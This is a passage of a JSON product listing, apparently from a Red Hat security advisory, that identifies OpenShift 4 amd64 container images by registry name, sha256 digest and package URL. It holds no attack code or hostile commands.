"name": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:1a4181f0d2ba03e2168f4bf87be3290711b65e96da3998b1315e6d29ed56bb5e_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:1a4181f0d2ba03e2168f4bf87be3290711b65e96da3998b1315e6d29ed56bb5e_amd64",
"product_id": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:1a4181f0d2ba03e2168f4bf87be3290711b65e96da3998b1315e6d29ed56bb5e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-etcd-rhel9@sha256%3A1a4181f0d2ba03e2168f4bf87be3290711b65e96da3998b1315e6d29ed56bb5e?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849791"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/frr-rhel9@sha256:344986bd16bbbd9fafe104e63c43c8049dec8a4851db413a807e8ae947a6d13c_amd64",
"product": {
"name": "registry.redhat.io/openshift4/frr-rhel9@sha256:344986bd16bbbd9fafe104e63c43c8049dec8a4851db413a807e8ae947a6d13c_amd64",
"product_id": "registry.redhat.io/openshift4/frr-rhel9@sha256:344986bd16bbbd9fafe104e63c43c8049dec8a4851db413a807e8ae947a6d13c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/frr-rhel9@sha256%3A344986bd16bbbd9fafe104e63c43c8049dec8a4851db413a807e8ae947a6d13c?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848367"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ec7a31da8937a874a6e5bb866f53f21eae3b174663e2f4e7c6bfceadb6ef9415_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ec7a31da8937a874a6e5bb866f53f21eae3b174663e2f4e7c6bfceadb6ef9415_amd64",
"product_id": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ec7a31da8937a874a6e5bb866f53f21eae3b174663e2f4e7c6bfceadb6ef9415_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-cloud-controller-manager-rhel9@sha256%3Aec7a31da8937a874a6e5bb866f53f21eae3b174663e2f4e7c6bfceadb6ef9415?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847086"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:acd9330cdd75e08c16c5f0e819d4200d353af95fe5943d25b7f4eec4c6f4595f_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:acd9330cdd75e08c16c5f0e819d4200d353af95fe5943d25b7f4eec4c6f4595f_amd64",
"product_id": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:acd9330cdd75e08c16c5f0e819d4200d353af95fe5943d25b7f4eec4c6f4595f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-cluster-api-controllers-rhel9@sha256%3Aacd9330cdd75e08c16c5f0e819d4200d353af95fe5943d25b7f4eec4c6f4595f?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847617"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:71be38fcf1f7e316ccc94937d0ebe9799762a8cbc14cadd426342c4cbc47f259_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:71be38fcf1f7e316ccc94937d0ebe9799762a8cbc14cadd426342c4cbc47f259_amd64",
"product_id": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:71be38fcf1f7e316ccc94937d0ebe9799762a8cbc14cadd426342c4cbc47f259_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-pd-csi-driver-rhel9@sha256%3A71be38fcf1f7e316ccc94937d0ebe9799762a8cbc14cadd426342c4cbc47f259?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847840"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e940d0365a64e273be01d35537c61be14f5ec1c3e8971ee8a41382861cf35efe_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e940d0365a64e273be01d35537c61be14f5ec1c3e8971ee8a41382861cf35efe_amd64",
"product_id": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e940d0365a64e273be01d35537c61be14f5ec1c3e8971ee8a41382861cf35efe_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-pd-csi-driver-operator-rhel9@sha256%3Ae940d0365a64e273be01d35537c61be14f5ec1c3e8971ee8a41382861cf35efe?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845937"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:2625f633345e56a2c008602b6489037488fc9054ff973cae80939ab88cc19d8b_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:2625f633345e56a2c008602b6489037488fc9054ff973cae80939ab88cc19d8b_amd64",
"product_id": "registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:2625f633345e56a2c008602b6489037488fc9054ff973cae80939ab88cc19d8b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ibm-cloud-controller-manager-rhel9@sha256%3A2625f633345e56a2c008602b6489037488fc9054ff973cae80939ab88cc19d8b?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847381"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:d8c47e73a2fd940fc9162adbbd62341086bd61376a830dfa270eeaed7621dc46_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:d8c47e73a2fd940fc9162adbbd62341086bd61376a830dfa270eeaed7621dc46_amd64",
"product_id": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:d8c47e73a2fd940fc9162adbbd62341086bd61376a830dfa270eeaed7621dc46_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ibm-vpc-block-csi-driver-rhel9@sha256%3Ad8c47e73a2fd940fc9162adbbd62341086bd61376a830dfa270eeaed7621dc46?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846048"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:eea66c84f7e2f69e9fbefc1b58ec9e544c1b6c3320bb631dbe2240a8737b600d_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:eea66c84f7e2f69e9fbefc1b58ec9e544c1b6c3320bb631dbe2240a8737b600d_amd64",
"product_id": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:eea66c84f7e2f69e9fbefc1b58ec9e544c1b6c3320bb631dbe2240a8737b600d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256%3Aeea66c84f7e2f69e9fbefc1b58ec9e544c1b6c3320bb631dbe2240a8737b600d?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844981"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5484533f421052d86a8d6ba388f38f3feb68e7a2e015a7123da87b7b4c7980b6_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5484533f421052d86a8d6ba388f38f3feb68e7a2e015a7123da87b7b4c7980b6_amd64",
"product_id": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5484533f421052d86a8d6ba388f38f3feb68e7a2e015a7123da87b7b4c7980b6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ibmcloud-cluster-api-controllers-rhel9@sha256%3A5484533f421052d86a8d6ba388f38f3feb68e7a2e015a7123da87b7b4c7980b6?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849835"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:c1977cc007191a46853b0a3915c45e9561664d4e06516ef1a04e8562df31420c_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:c1977cc007191a46853b0a3915c45e9561664d4e06516ef1a04e8562df31420c_amd64",
"product_id": "registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:c1977cc007191a46853b0a3915c45e9561664d4e06516ef1a04e8562df31420c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ibmcloud-machine-controllers-rhel9@sha256%3Ac1977cc007191a46853b0a3915c45e9561664d4e06516ef1a04e8562df31420c?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845460"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:47db252dd861d805da4299bc67982e1472777ae0484edc17c43d6f0bcac74c94_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:47db252dd861d805da4299bc67982e1472777ae0484edc17c43d6f0bcac74c94_amd64",
"product_id": "registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:47db252dd861d805da4299bc67982e1472777ae0484edc17c43d6f0bcac74c94_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-image-customization-controller-rhel9@sha256%3A47db252dd861d805da4299bc67982e1472777ae0484edc17c43d6f0bcac74c94?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844628"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c7fa7dc7e546ef6d5b322e521bdbf86e7be13859167e071839d6164a128b5954_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c7fa7dc7e546ef6d5b322e521bdbf86e7be13859167e071839d6164a128b5954_amd64",
"product_id": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c7fa7dc7e546ef6d5b322e521bdbf86e7be13859167e071839d6164a128b5954_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-insights-rhel9-operator@sha256%3Ac7fa7dc7e546ef6d5b322e521bdbf86e7be13859167e071839d6164a128b5954?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845624"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:b4fd7ff14b54766e058b847d7f91c13dc17bf661e45c07bca5bc9754d20e14ae_amd64",
"product": {
"name": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:b4fd7ff14b54766e058b847d7f91c13dc17bf661e45c07bca5bc9754d20e14ae_amd64",
"product_id": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:b4fd7ff14b54766e058b847d7f91c13dc17bf661e45c07bca5bc9754d20e14ae_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/insights-runtime-exporter-rhel9@sha256%3Ab4fd7ff14b54766e058b847d7f91c13dc17bf661e45c07bca5bc9754d20e14ae?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847882"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:846447487434a57df9b33f06fb5704fcc96ffa518baf6d99223c4e1795e5c643_amd64",
"product": {
"name": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:846447487434a57df9b33f06fb5704fcc96ffa518baf6d99223c4e1795e5c643_amd64",
"product_id": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:846447487434a57df9b33f06fb5704fcc96ffa518baf6d99223c4e1795e5c643_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/insights-runtime-extractor-rhel9@sha256%3A846447487434a57df9b33f06fb5704fcc96ffa518baf6d99223c4e1795e5c643?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848023"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:e979034a8badf7cc5b0091f97e3e8d2e7b4db1e14aa71256974e7ad58324bfc3_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:e979034a8badf7cc5b0091f97e3e8d2e7b4db1e14aa71256974e7ad58324bfc3_amd64",
"product_id": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:e979034a8badf7cc5b0091f97e3e8d2e7b4db1e14aa71256974e7ad58324bfc3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-installer-rhel9@sha256%3Ae979034a8badf7cc5b0091f97e3e8d2e7b4db1e14aa71256974e7ad58324bfc3?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773851387"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:e176cc10b2b9b4b8659796de90b1680c040f79c0f0403f0ef534652144128f7a_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:e176cc10b2b9b4b8659796de90b1680c040f79c0f0403f0ef534652144128f7a_amd64",
"product_id": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:e176cc10b2b9b4b8659796de90b1680c040f79c0f0403f0ef534652144128f7a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-installer-artifacts-rhel9@sha256%3Ae176cc10b2b9b4b8659796de90b1680c040f79c0f0403f0ef534652144128f7a?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773851359"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:e6ea068305ca712061e83e4352b3fa9c2431dca533473928fa3c87ad1dc45a01_amd64",
"product": {
"name": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:e6ea068305ca712061e83e4352b3fa9c2431dca533473928fa3c87ad1dc45a01_amd64",
"product_id": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:e6ea068305ca712061e83e4352b3fa9c2431dca533473928fa3c87ad1dc45a01_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/kube-metrics-server-rhel9@sha256%3Ae6ea068305ca712061e83e4352b3fa9c2431dca533473928fa3c87ad1dc45a01?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845477"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:3d02603962035bdee1a13b1b0d17740cc9c5bcdc89f2372652e5a7dd907ca313_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:3d02603962035bdee1a13b1b0d17740cc9c5bcdc89f2372652e5a7dd907ca313_amd64",
"product_id": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:3d02603962035bdee1a13b1b0d17740cc9c5bcdc89f2372652e5a7dd907ca313_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-storage-version-migrator-rhel9@sha256%3A3d02603962035bdee1a13b1b0d17740cc9c5bcdc89f2372652e5a7dd907ca313?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849586"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:1379cb01ad37cd0e9485c04dbe8ed2fa8eef5eac26a5c9b12277bda753d80305_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:1379cb01ad37cd0e9485c04dbe8ed2fa8eef5eac26a5c9b12277bda753d80305_amd64",
"product_id": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:1379cb01ad37cd0e9485c04dbe8ed2fa8eef5eac26a5c9b12277bda753d80305_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kubevirt-cloud-controller-manager-rhel9@sha256%3A1379cb01ad37cd0e9485c04dbe8ed2fa8eef5eac26a5c9b12277bda753d80305?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848525"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:a1a7aff47d11acf486bb1e83bcb6aaffe8bc50dd4c655150708ede4cb9359c6d_amd64",
"product": {
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:a1a7aff47d11acf486bb1e83bcb6aaffe8bc50dd4c655150708ede4cb9359c6d_amd64",
"product_id": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:a1a7aff47d11acf486bb1e83bcb6aaffe8bc50dd4c655150708ede4cb9359c6d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/kubevirt-csi-driver-rhel9@sha256%3Aa1a7aff47d11acf486bb1e83bcb6aaffe8bc50dd4c655150708ede4cb9359c6d?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848335"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:036574a35e17a571639d3f885f5699462f7ad81e5b2ddc445259eea543f54daa_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:036574a35e17a571639d3f885f5699462f7ad81e5b2ddc445259eea543f54daa_amd64",
"product_id": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:036574a35e17a571639d3f885f5699462f7ad81e5b2ddc445259eea543f54daa_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-libvirt-machine-controllers-rhel9@sha256%3A036574a35e17a571639d3f885f5699462f7ad81e5b2ddc445259eea543f54daa?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844441"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:a44c7d7358f6e6323c1898ea14923840a93d99447233c7f10fa1d3975b096bbd_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:a44c7d7358f6e6323c1898ea14923840a93d99447233c7f10fa1d3975b096bbd_amd64",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:a44c7d7358f6e6323c1898ea14923840a93d99447233c7f10fa1d3975b096bbd_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-rhel9-operator@sha256%3Aa44c7d7358f6e6323c1898ea14923840a93d99447233c7f10fa1d3975b096bbd?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844528"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:ac5b7d8a01e37587166f1526c80776770c07821056b23f10b9d1d0801a09503f_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:ac5b7d8a01e37587166f1526c80776770c07821056b23f10b9d1d0801a09503f_amd64",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:ac5b7d8a01e37587166f1526c80776770c07821056b23f10b9d1d0801a09503f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-provider-aws-rhel9@sha256%3Aac5b7d8a01e37587166f1526c80776770c07821056b23f10b9d1d0801a09503f?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844574"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:6decd3b60d897571e96a3b6f468e1dbcec4ca95b871088916d2b03241c25a033_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:6decd3b60d897571e96a3b6f468e1dbcec4ca95b871088916d2b03241c25a033_amd64",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:6decd3b60d897571e96a3b6f468e1dbcec4ca95b871088916d2b03241c25a033_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-provider-azure-rhel9@sha256%3A6decd3b60d897571e96a3b6f468e1dbcec4ca95b871088916d2b03241c25a033?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844581"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:ab0b0d0164deea8407004db4c43be6d6626fcb35dee99f9a75e2fd5bfca244b9_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:ab0b0d0164deea8407004db4c43be6d6626fcb35dee99f9a75e2fd5bfca244b9_amd64",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:ab0b0d0164deea8407004db4c43be6d6626fcb35dee99f9a75e2fd5bfca244b9_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-provider-gcp-rhel9@sha256%3Aab0b0d0164deea8407004db4c43be6d6626fcb35dee99f9a75e2fd5bfca244b9?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847371"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eb3b40f400c13c67de4aa77a3dcde6fa23a03b6ef172c6a3ac8762cee620608b_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eb3b40f400c13c67de4aa77a3dcde6fa23a03b6ef172c6a3ac8762cee620608b_amd64",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eb3b40f400c13c67de4aa77a3dcde6fa23a03b6ef172c6a3ac8762cee620608b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-provider-openstack-rhel9@sha256%3Aeb3b40f400c13c67de4aa77a3dcde6fa23a03b6ef172c6a3ac8762cee620608b?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848305"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:0c9bb9ad12077b33f55b6696106afb58e0750f983c4f15edf0366244dbf4c58c_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:0c9bb9ad12077b33f55b6696106afb58e0750f983c4f15edf0366244dbf4c58c_amd64",
"product_id": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:0c9bb9ad12077b33f55b6696106afb58e0750f983c4f15edf0366244dbf4c58c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-os-images-rhel9@sha256%3A0c9bb9ad12077b33f55b6696106afb58e0750f983c4f15edf0366244dbf4c58c?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773860329"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:fb61e8a96ed0bd890b7e2ee52bffd6402ccca92e056fb43bb4c577f83eff2a1d_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:fb61e8a96ed0bd890b7e2ee52bffd6402ccca92e056fb43bb4c577f83eff2a1d_amd64",
"product_id": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:fb61e8a96ed0bd890b7e2ee52bffd6402ccca92e056fb43bb4c577f83eff2a1d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-admission-controller-rhel9@sha256%3Afb61e8a96ed0bd890b7e2ee52bffd6402ccca92e056fb43bb4c577f83eff2a1d?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847693"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:b65bfa071caa14408e3d4f2a3485e2f5d8edcdebeb24280000fb4efaa162a731_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:b65bfa071caa14408e3d4f2a3485e2f5d8edcdebeb24280000fb4efaa162a731_amd64",
"product_id": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:b65bfa071caa14408e3d4f2a3485e2f5d8edcdebeb24280000fb4efaa162a731_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-route-override-cni-rhel9@sha256%3Ab65bfa071caa14408e3d4f2a3485e2f5d8edcdebeb24280000fb4efaa162a731?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846709"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5e61f9895dd3c359917209aaa56cb9a1fba5e7b7946348f44ff1301045f0d1f0_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5e61f9895dd3c359917209aaa56cb9a1fba5e7b7946348f44ff1301045f0d1f0_amd64",
"product_id": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5e61f9895dd3c359917209aaa56cb9a1fba5e7b7946348f44ff1301045f0d1f0_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-whereabouts-ipam-cni-rhel9@sha256%3A5e61f9895dd3c359917209aaa56cb9a1fba5e7b7946348f44ff1301045f0d1f0?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846291"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:21d7e4128260488050af9719a2d28f408615f44a49265503b797f35215f76ca7_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:21d7e4128260488050af9719a2d28f408615f44a49265503b797f35215f76ca7_amd64",
"product_id": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:21d7e4128260488050af9719a2d28f408615f44a49265503b797f35215f76ca7_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-must-gather-rhel9@sha256%3A21d7e4128260488050af9719a2d28f408615f44a49265503b797f35215f76ca7?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773851203"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:4def742b6a5ef27c09ac9540e132622ec7178284d8900b9a844cb425e8be0c94_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:4def742b6a5ef27c09ac9540e132622ec7178284d8900b9a844cb425e8be0c94_amd64",
"product_id": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:4def742b6a5ef27c09ac9540e132622ec7178284d8900b9a844cb425e8be0c94_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-network-interface-bond-cni-rhel9@sha256%3A4def742b6a5ef27c09ac9540e132622ec7178284d8900b9a844cb425e8be0c94?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844493"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:43e816c2f891134e527145559d700e6b393b9ccec1e3c51ab45dc3ba4ac5f266_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:43e816c2f891134e527145559d700e6b393b9ccec1e3c51ab45dc3ba4ac5f266_amd64",
"product_id": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:43e816c2f891134e527145559d700e6b393b9ccec1e3c51ab45dc3ba4ac5f266_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-network-metrics-daemon-rhel9@sha256%3A43e816c2f891134e527145559d700e6b393b9ccec1e3c51ab45dc3ba4ac5f266?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844925"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:002057809ba8771cebee023519dbfb91a5b4f5102a292695a7d6746e93faaeaf_amd64",
"product": {
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:002057809ba8771cebee023519dbfb91a5b4f5102a292695a7d6746e93faaeaf_amd64",
"product_id": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:002057809ba8771cebee023519dbfb91a5b4f5102a292695a7d6746e93faaeaf_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/network-tools-rhel9@sha256%3A002057809ba8771cebee023519dbfb91a5b4f5102a292695a7d6746e93faaeaf?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773737444"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:d6a1551a5182293d917f662c42fc6b78c53577d57eaa97490a1a59a436ea2a1a_amd64",
"product": {
